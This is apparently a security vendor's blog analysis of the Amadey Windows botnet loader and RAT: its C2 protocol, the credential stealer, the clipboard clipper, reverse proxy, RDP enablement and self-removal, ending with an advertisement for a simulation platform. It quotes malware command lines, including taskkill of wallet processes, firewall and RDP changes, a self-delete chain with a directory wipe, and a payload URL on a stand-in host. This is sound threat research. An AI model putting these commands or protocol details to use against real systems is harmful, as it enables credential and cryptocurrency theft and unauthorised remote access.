Amadey Malware Explained: How the Windows Botnet Loader and RAT Work
| July 01, 2026
Key Takeaways
- Amadey is a resilient Windows botnet and malware loader, first seen in October 2018, and evolved into a modular RAT.
- Often paired with SmokeLoader, Amadey served as a dominant loader for LockBit 3.0 ransomware and state-sponsored Secret Blizzard.
- Amadey beacons to up to three hardcoded C2 servers over HTTP POST through a three-stage check-in, registration, and tasking lifecycle.
- Modern builds add a reverse TCP proxy, Hidden VNC module, admin account creation, and RDP enablement.
- Plugin modules steal browser, email, and FTP credentials, harvest crypto wallets, and swap clipboard wallet addresses to hijack funds.
- The Picus Platform lets security teams simulate Amadey attacks and validate security controls within minutes.
Amadey is a resilient Windows botnet and malware loader, first seen in October 2018, that has evolved into a modular Remote Access Trojan (RAT) capable of credential theft, network pivoting, hidden remote desktop control, and clipboard hijacking.
In this blog, we explain how Amadey operates both as a malware loader and as a RAT and show how to validate your security controls against this threat with the Picus Platform.
What Is Amadey Malware?
Amadey is a commodity malware loader and information stealer that doubles as a botnet client. It is deployed onto Windows machines to profile the host, beacon to attacker infrastructure, and execute follow-on tasks such as downloading payloads, stealing data, or granting remote access. It is written primarily for the x86 (32-bit) architecture, with native 64-bit variants appearing in more recent builds.
Amadey is often paired with SmokeLoader, which acts as the initial infection vector and then drops Amadey to manage secondary payloads. It has served as a dominant loader for high-profile ransomware such as LockBit 3.0. It has also been adopted by state-sponsored actors, including the Russian FSB-linked group tracked as Secret Blizzard, which used the commodity botnet as camouflage while profiling Ukrainian military targets.
From Loader to RAT
Amadey's evolution is a shift in design philosophy. Its earlier generation was a pure file-distribution loader: it only downloaded and ran executables, DLLs, and scripts, with no interactive control.
The modern generation bakes network and remote-control capabilities directly into the client [1]:
- A native reverse TCP proxy for pivoting into the victim's internal network.
- A Hidden VNC module (derived from the leaked TinyNuke hidden-desktop codebase) for stealthy remote desktop access.
- Native administrative account creation and RDP enablement for hands-on-keyboard persistence.
Together, these turn compromised hosts into reusable infrastructure rather than disposable staging grounds.
How Does Amadey Malware Work?
Amadey works by beaconing to one of up to three hardcoded C2 servers over HTTP POST, registering an encrypted profile of the infected machine, and then executing a list of numbered tasks the server returns.
The C2 Protocol and Three-Stage Lifecycle
Amadey's command-and-control runs over HTTP POST to up to three different C2 addresses, all using paths that end in .php. Server responses that carry data (the sleep interval and task lists) are wrapped in <c> and <d> tags, and multiple tasks inside that block are separated by the # character.
The lifecycle has three stages:
Stage 1: Initial Beacon (Check-in)
The client announces it is alive and asks how long to sleep between cycles.
|
POST /<path>.php HTTP/1.1 Host: <c2-address> st=s # static beacon body meaning "I'm alive, give me the sleep interval" |
The server replies with a single integer wrapped in tags:
|
<c>5<d> # sleep 5 minutes; the bot waits 5 minutes between cycles |
Stage 2: Registration and System Profiling
The registration payload is a single plaintext string built from 12 key-value pairs concatenated with no delimiters, in a fixed order, formatted as key:value [1]:
|
id:<value>vs:<version>sd:<6hex>os:18bi:1ar:1pc:<host>un:<user>dm:<domain>av:13lv:0og:1 # id -> user identifier, transformed from the Windows SID (see Unit ID below) # sd -> campaign ID (6-character hex string) # os -> operating system ID, an integer 1-19 (here 18 = Win11; 1 = Win10) # bi -> OS bitness (0 = 32-bit, 1 = 64-bit) # ar -> admin rights flag (1 if HKLM\System opens with full access, else 0) # av -> antivirus ID, an integer 0-13 (from %ProgramData% vendor folders) # lv -> integrity level, inferred from file size 400-600 KB (0 = high, 1 = low) # og -> stub type (0 = crypt/packed, 1 = original) |
The id field (the "unit" ID) is the one piece worth expanding, since the same value is reused across status reports, screenshot filenames, and the credential stealer. It is derived from the Windows SID by pulling out every digit and taking a 12-character substring from position 5:
|
SID: S-1-5-21-1602875793-2845710046-1763498205-1107 digits: 15211602875793284571004617634982051107 # all numeric characters, in order unit ID: 602875793284 # substring at offset 5, length 12 |
Once assembled, the full string is RC4-encrypted with a preconfigured key, hex-encoded, and prefixed with r= before transmission:
|
r=<hex_encoded(rc4_encrypted(system_info))> |
The server's response to registration is the task list.
Stage 3: Tasking and Execution
The server returns one or more tasks inside <c>/<d> tags. The client extracts the string, splits it on #, and processes each command individually.
For example, the server's tasking response (with a single task) looks like this:
|
<c>11111110203<d> # the client strips the <c>/<d> tags, then reads the task header # 1111111 -> 7-digit task id # 0 -> elevation flag (normal privileges) # 20 -> command id (capture and exfiltrate screenshot) # 3 -> target directory id (Desktop) |
The 2-digit command ID maps to a specific action. Many are routine loader functions for downloading and running different file types (EXE, DLL, CMD, PowerShell, MSI, and ZIP payloads). The commands that stand out, the ones that make Amadey a RAT rather than a plain downloader, are:
- 15 / 16 - Start and stop the reverse TCP proxy used to pivot into the victim's internal network.
- 21 - Launch the credential stealer plugin (cred(64).dll).
- 22 - Launch the clipboard clipper plugin (clip(64).dll).
- 23 - Start a hidden VNC session for stealthy remote desktop control.
- 25 - Create a backdoor administrative account from a Username@Password payload.
- 18 / 19 - Self-update and self-remove (uninstall), giving operators control over the bot's lifecycle.
We will explain some of these commands in more detail below.
Several commands also support a persistence marker. If the payload URL begins with !, the malware strips that character and writes an HKLM\...\Run key so the downloaded file runs at every logon:
|
!http://malicious.example/payload.exe # the leading ! enables Run-key persistence for this payload |
After each task, the bot reports back with a dedicated POST request. The body pairs a status token with the 11-character task header and the unit ID.
Some examples are given below:
|
d1=11111110203&unit=602875793284 # d1 = task completed successfully e1=11111110203&unit=602875793284 # e1 = download/validation error (file too small or unwritable) ... e3=11111110203&unit=602875793284 # e3 = restricted/region block (CIS keyboard layout detected) |
The Reverse TCP Proxy for Network Pivoting
One of the capabilities that turns Amadey into a RAT is a reverse TCP proxy. It lets the attacker use the infected machine as a stepping stone to reach other computers on the victim's internal network, machines the attacker could never connect to directly because they sit behind a firewall or router.
So rather than the attacker connecting into the victim, the infected machine connects out to the attacker's proxy server and keeps that connection open. The attacker then sends instructions back down this single open pipe, which is called the C2 Proxy Channel. Over that one channel, the attacker can ask the bot to open connections (tunnels) to many internal targets at the same time.
The sequence diagram shows the flow between the C2 Proxy Channel and internal targets:
Figure 1. Reverse TCP Proxy Capability of Amadey Malware
The Credential Stealer Module
The credential stealer is a DLL launched via rundll32.exe that harvests two categories of data: text credentials (browsers, email, FTP/SSH) and file-based assets (cryptocurrency wallets, Telegram sessions, and desktop documents). It uses the same C2 servers as the core bot.
Text credentials are aggregated into one pipe-delimited buffer [1]:
|
# one record; ::: separates records {type}|{client}|{field1}|{field2}|{field3}::: # example: web|Chrome|https://login.example|user@mail.com|p4ssw0rd::: # final body id=602875793284&cred=<all records concatenated> |
For cryptocurrency wallets, it targets several wallet types and, to unlock locked database files, it kills the relevant processes first:
|
taskkill /IM Electrum.exe /F taskkill /IM Telegram.exe /F |
The module also sweeps the Desktop for documents (.txt, .doc, .docx, .xls, .xlsx), capped at 200 KB per file and 20 files total, staged in %TEMP%\_Files_\ and archived as {unitID}_Desktop.zip.
The Clipboard Clipper Module
The clipper is a small 32-bit DLL whose only job is to swap cryptocurrency addresses on the clipboard with the operator's wallets. It performs a single handshake to fetch the replacement templates, then runs silently:
|
wlt=1 # the only request the clipper sends (Content-Type: x-www-form-urlencoded) |
The server returns five wallet addresses inside positional tags, in a fixed order [1]:
|
_1_<bitcoin>-1-_2_<ethereum>-2-_3_<litecoin>-3-_4_<dogecoin>-4-_5_<monero>-5- # prefix +++ means each value is hex + RC4 encoded; prefix --- means plaintext |
Once addresses are cached in memory, it monitors the clipboard and replaces detected addresses by currency type. Doing this when the victim copies a recipient's wallet address to send cryptocurrency, the pasted address is silently swapped for the attacker's, so the funds go to the attacker instead.
Other RAT Capabilities: RDP, Self-Update, and Self-Remove
Amadey also includes a few additional functions: enabling RDP, updating itself, and removing itself from the host.
Enabling RDP
The bot exposes Remote Desktop in four steps, combining a direct registry write with shell commands [1]:
|
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server -> fDenyTSConnections = 0 (0 = allow RDP) netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes :: open the firewall for RDP :: make the RDP service auto-start sc config termservice start= auto
:: start it now, no reboot needed net start termservice |
Self-Update Capability
After downloading the new binary, the bot runs a chained command to swap itself out cleanly [1]:
|
cmd.exe /k taskkill /f /im "{current_exe}" && timeout 1 && del "{current_exe}" && ren {new_file} {current_exe} && {current_exe} && Exit :: kill the running bot -> wait 1s -> delete the old binary -> rename the update to the original name -> relaunch -> exit |
Self-Remove Capability
The bot deletes its scheduled task (if persistence was set), terminates and deletes itself, and queues a failsafe directory wipe [1]:
|
cmd.exe /k taskkill /f /im "{exe_name}" && timeout 1 && del {exe_name} && Exit :: as a backstop, a RunOnce key queues: cmd /C RMDIR /s/q <install_dir> (runs at next logon to force-clean the folder) |
How Picus Simulates Amadey Malware Attacks?
We strongly suggest simulating Amadey Malware Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the Amadey Malware Attacks:
|
Threat ID |
Threat Name |
Attack Module |
|
52201 |
Amadey Loader Email Threat |
E-mail Infiltration |
|
83925 |
Amadey Loader Download Threat |
Network Infiltration |
|
78185 |
Amadey Botnet Download Threat |
Network Infiltration |
|
78355 |
Amadey Botnet Email Threat |
E-mail Infiltration |
|
49927 |
Amadey Malware Dropper Download Threat |
Network Infiltration |
|
94691 |
Amadey Malware Dropper Email Threat |
E-mail Infiltration |
|
73981 |
Amadey Infostealer Download Threat |
Network Infiltration |
|
36827 |
Amadey Infostealer Email Threat |
E-mail Infiltration |
|
30940 |
Amadey Malware Downloader Download Threat |
Network Infiltration |
|
92185 |
Amadey Malware Downloader Email Threat |
E-mail Infiltration |
|
35338 |
Amadey Trojan Email Threat |
E-mail Infiltration |
|
89909 |
Amadey Trojan Download Threat |
Network Infiltration |
|
92827 |
Amadey Stealer pushed by RigEK Download Threat |
Network Infiltration |
|
31585 |
Amadey Stealer pushed by RigEK Email Threat |
E-mail Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.
References
[1] M. Gras, “Unmasking Amadey 5.” Accessed: Jun. 29, 2026. [Online]. Available: https://binaryanalys.is/posts/amadey/

